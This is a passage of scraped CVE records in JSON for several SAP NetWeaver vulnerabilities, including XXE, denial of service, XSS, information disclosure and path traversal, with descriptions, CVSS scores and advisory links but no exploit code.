"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-08-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"name": "20151124 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2015/Nov/92"
},
{
"name": "20151123 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-6662",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html"
},
{
"name": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"name": "20151124 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2015/Nov/92"
},
{
"name": "20151123 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-6662",
"datePublished": "2015-08-24T14:00:00",
"dateReserved": "2015-08-24T00:00:00",
"dateUpdated": "2024-08-06T07:29:24.276Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-8592
Vulnerability from cvelistv5
Published
2014-11-04 15:00
Modified
2024-08-06 13:26
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T13:26:00.840Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://twitter.com/SAP_Gsupport/status/523111735637864448"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-10-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://twitter.com/SAP_Gsupport/status/523111735637864448"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-8592",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/",
"refsource": "MISC",
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"name": "https://service.sap.com/sap/support/notes/1986725",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"name": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/",
"refsource": "MISC",
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"name": "https://twitter.com/SAP_Gsupport/status/523111735637864448",
"refsource": "CONFIRM",
"url": "https://twitter.com/SAP_Gsupport/status/523111735637864448"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-8592",
"datePublished": "2014-11-04T15:00:00",
"dateReserved": "2014-11-04T00:00:00",
"dateUpdated": "2024-08-06T13:26:00.840Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2011-1517
Vulnerability from cvelistv5
Published
2020-02-05 22:15
Modified
2024-08-06 22:28
Severity ?
EPSS score ?
Summary
SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/53424 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75452 | x_refsource_MISC | |
| http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T22:28:41.961Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/53424"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-05T22:15:25",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/bid/53424"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-1517",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.securityfocus.com/bid/53424",
"refsource": "MISC",
"url": "http://www.securityfocus.com/bid/53424"
},
{
"name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452",
"refsource": "MISC",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"name": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html",
"refsource": "MISC",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-1517",
"datePublished": "2020-02-05T22:15:25",
"dateReserved": "2011-03-23T00:00:00",
"dateUpdated": "2024-08-06T22:28:41.961Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-6285
Vulnerability from cvelistv5
Published
2020-07-14 12:30
Modified
2024-08-04 08:55
Severity ?
EPSS score ?
Summary
SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2932473 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) |
Version: < 7.10 Version: < 7.11 Version: < 7.20 Version: < 7.30 Version: < 7.31 Version: < 7.40 Version: < 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:55:22.414Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2932473"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.10"
},
{
"status": "affected",
"version": "\u003c 7.11"
},
{
"status": "affected",
"version": "\u003c 7.20"
},
{
"status": "affected",
"version": "\u003c 7.30"
},
{
"status": "affected",
"version": "\u003c 7.31"
},
{
"status": "affected",
"version": "\u003c 7.40"
},
{
"status": "affected",
"version": "\u003c 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Information Disclosure",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-07-14T12:30:14",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2932473"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2020-6285",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.10"
},
{
"version_name": "\u003c",
"version_value": "7.11"
},
{
"version_name": "\u003c",
"version_value": "7.20"
},
{
"version_name": "\u003c",
"version_value": "7.30"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.40"
},
{
"version_name": "\u003c",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure."
}
]
},
"impact": {
"cvss": {
"baseScore": "7.7",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Information Disclosure"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2932473",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2932473"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2020-6285",
"datePublished": "2020-07-14T12:30:14",
"dateReserved": "2020-01-08T00:00:00",
"dateUpdated": "2024-08-04T08:55:22.414Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-1964
Vulnerability from cvelistv5
Published
2014-02-14 15:00
Modified
2024-08-06 09:58
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1788080 | x_refsource_CONFIRM | |
| https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/ | x_refsource_MISC | |
| http://secunia.com/advisories/56947 | third-party-advisory, x_refsource_SECUNIA | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/91095 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:16.352Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1788080"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "netweaver-dir-xss(91095)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-01T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://service.sap.com/sap/support/notes/1788080"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"name": "56947",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/56947"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "netweaver-dir-xss(91095)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1964",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1788080",
"refsource": "CONFIRM",
"url": "https://service.sap.com/sap/support/notes/1788080"
},
{
"name": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"name": "56947",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/56947"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "netweaver-dir-xss(91095)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1964",
"datePublished": "2014-02-14T15:00:00",
"dateReserved": "2014-02-14T00:00:00",
"dateUpdated": "2024-08-06T09:58:16.352Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-6203
Vulnerability from cvelistv5
Published
2020-03-10 20:20
Modified
2024-08-04 08:55
Severity ?
EPSS score ?
Summary
SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing 'traverse to parent directory' are passed through to the file APIs, leading to Path Traversal.
References
| ▼ | URL | Tags |
|---|---|---|
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305 | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/2806198 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver UDDI Server (Services Registry) |
Version: < 7.10 Version: < 7.11 Version: < 7.20 Version: < 7.30 Version: < 7.31 Version: < 7.40 Version: < 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:55:21.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2806198"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver UDDI Server (Services Registry)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.10"
},
{
"status": "affected",
"version": "\u003c 7.11"
},
{
"status": "affected",
"version": "\u003c 7.20"
},
{
"status": "affected",
"version": "\u003c 7.30"
},
{
"status": "affected",
"version": "\u003c 7.31"
},
{
"status": "affected",
"version": "\u003c 7.40"
},
{
"status": "affected",
"version": "\u003c 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u0027traverse to parent directory\u0027 are passed through to the file APIs, leading to Path Traversal."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Path Traversal",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-03-10T20:20:04",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2806198"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2020-6203",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver UDDI Server (Services Registry)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.10"
},
{
"version_name": "\u003c",
"version_value": "7.11"
},
{
"version_name": "\u003c",
"version_value": "7.20"
},
{
"version_name": "\u003c",
"version_value": "7.30"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.40"
},
{
"version_name": "\u003c",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u0027traverse to parent directory\u0027 are passed through to the file APIs, leading to Path Traversal."
}
]
},
"impact": {
"cvss": {
"baseScore": "9.1",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Path Traversal"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305"
},
{
"name": "https://launchpad.support.sap.com/#/notes/2806198",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2806198"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
